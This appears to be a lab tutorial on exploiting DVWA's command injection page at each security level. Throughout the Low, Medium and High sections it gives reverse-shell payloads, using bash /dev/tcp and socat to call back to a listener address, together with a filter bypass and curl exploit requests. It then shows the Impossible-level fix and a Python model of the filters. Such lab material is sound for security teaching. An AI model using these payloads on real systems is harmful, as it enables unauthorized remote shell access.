Command injection reverse shell

This article walks through exploiting the command injection vulnerability at the different security levels of DVWA (Damn Vulnerable Web Application), including using `&&` and `||` to chain commands on Linux and how to bypass the filtering at the High level. It also covers using nc and socat to set up a reverse shell, and gives curl command examples that demonstrate the vulnerability.
(Summary generated by CSDN's AI)

AWVS Command Injection

On Linux, && runs the second command only if the first one succeeds.
|| runs the second command only if the first one fails.

Example request (high) [screenshot omitted]

Low
No restrictions at all.

8.8.8.8;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"

After a while the browser shows a timeout.
(rlwrap nc -lvnp 9999)
python3 -c "import pty;pty.spawn('/bin/bash')"
If nc exits promptly, the browser echoes the output:

curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl"  \
-s | grep uid

Notes on the curl options are at the bottom ↓

https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/


Medium
"&&" and ";" are replaced with empty strings. A single "&" is not filtered.

On Linux, the & symbol runs the command in the background.
The shell prints the job number, process ID, job status and the command that started the job
(https://linuxize.com/post/how-to-run-linux-commands-in-background/)
The | symbol feeds the output of the previous command into the next one as its input, i.e. the well-known pipe. Whatever the command before the pipe outputs, the command after the pipe still tries to run.

For example:

8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&

High

The following substitutions are applied. Note that the third entry "| " has a space after the "|". This is similar to Medium; the difference is that more characters are filtered.

$substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    ); 

Using socat for the remote connection

socat is a multi-purpose networking tool on Linux; the name comes from "Socket CAT". Its functionality is similar to Netcat, and it can be seen as an enhanced version of Netcat. [https://cybr.com/ethical-hacking-archives/create-a-reverse-shell-with-socat-dvwa-os-command-injections/]
socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. (Manual)
PHP trim(): strips whitespace (or other characters) from the beginning and end of a string.

8.8.8.8|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint

https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/

curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=high;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl"  \
-s | grep uid
<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impossible
😦:(

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octets
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Oops. Let the user know there's a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?> 
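The Medium, High and Impossible handlers above side by side, as an added Python model (not code from this post or from DVWA) that reproduces the two denylists and an allowlist check equivalent to the Impossible level, so the difference can be verified on sample input; the substitution tables are copied from the post's description, and ipaddress.IPv4Address stands in for PHP's is_numeric() (it is stricter).

```python
# Added example: model of the DVWA Medium/High denylists and the Impossible
# allowlist. Sample inputs are constructed for the checks below.
import ipaddress

# Medium level: only "&&" and ";" are stripped (per the post's description).
MEDIUM_SUBSTITUTIONS = {"&&": "", ";": ""}

# High level: the list quoted in the post. Note "| " carries a trailing space.
HIGH_SUBSTITUTIONS = {
    "&": "", ";": "", "| ": "", "-": "", "$": "",
    "(": "", ")": "", "`": "", "||": "",
}


def apply_denylist(target: str, substitutions: dict) -> str:
    """Mimic PHP str_replace(array_keys($subs), $subs, $target): each search
    string is removed in order, over the whole string, one after another."""
    for needle, replacement in substitutions.items():
        target = target.replace(needle, replacement)
    return target


def denylist_leaks(target: str, substitutions: dict) -> bool:
    """True when a shell metacharacter survives the denylist, i.e. the
    filtered value would still carry a command separator into shell_exec()."""
    return any(c in apply_denylist(target, substitutions) for c in "&;|`$()")


def validate_ipv4(target: str):
    """Impossible level in allowlist form: the value must be exactly four
    dotted decimal octets forming a valid IPv4 address; anything else yields
    None and never reaches the shell. (Stricter than PHP is_numeric(), which
    would also accept octets such as "1e3".)"""
    parts = target.split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        return None
    try:
        return str(ipaddress.IPv4Address(target))
    except ValueError:
        return None
```

Running the post's own inputs through it shows why Medium still lets a lone "&" through, why High removes "| " but not "|", and that the allowlist rejects every such value.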

curl option reference (from the curl manual)

-X, --request <method>
    -X HEAD will not suffice. You need to use the -I, --head option.
    The method string you set with -X, --request will be used for all requests, which if you for example use -L, --location may cause unintended side-effects when curl does not
    If -X, --request is provided several times, the last set value will be used.
      curl -X "DELETE" https://example.com
      curl -X NLST ftp://example.com/

-d, --data <data>
    --data-raw is almost the same but does not have a special interpretation of the @ character. To post data purely binary, you should instead use the --data-binary option. To URL-encode the value of a form field you may use --data-urlencode.
    If any of these options is used more than once on the same command line, the data pieces specified will be merged with a separating &-symbol. Thus, using '-d name=daniel -d
    named 'foobar' would thus be done with -d, --data @foobar. When -d, --data is told to read from a file like that, carriage returns and newlines will be stripped out. If you do not want the @ character to have a special interpretation use --data-raw instead.
    -d, --data can be used several times in a command line
      curl -d "name=curl" https://example.com
      curl -d "name=curl" -d "tool=cmdline" https://example.com
      curl -d @filename https://example.com
    See also --data-binary, --data-urlencode and --data-raw. This option is mutually exclusive to -F, --form and -I, --head and -T, --upload-file.

-H, --header <header/@file>
    without knowing perfectly well what you are doing. Remove an internal header by giving a replacement without content on the right side of the colon, as in: -H "Host:". If you send the custom header with no-value then its header must be terminated with a semicolon, such as -H "X-Custom-Header;" to send "X-Custom-Header:".
    -H, --header can be used several times in a command line
      curl -H "X-First-Name: Joe" https://example.com
      curl -H "User-Agent: yes-please/2000" https://example.com
      curl -H "Host:" https://example.com
      curl -H @headers.txt https://example.com

-s, --silent
    Use -S, --show-error in addition to this option to disable progress meter but still show error messages.
    Providing -s, --silent multiple times has no extra effect. Disable it again with --no-silent.
      curl -s https://example.com
    See also -v, --verbose, --stderr and --no-progress-meter.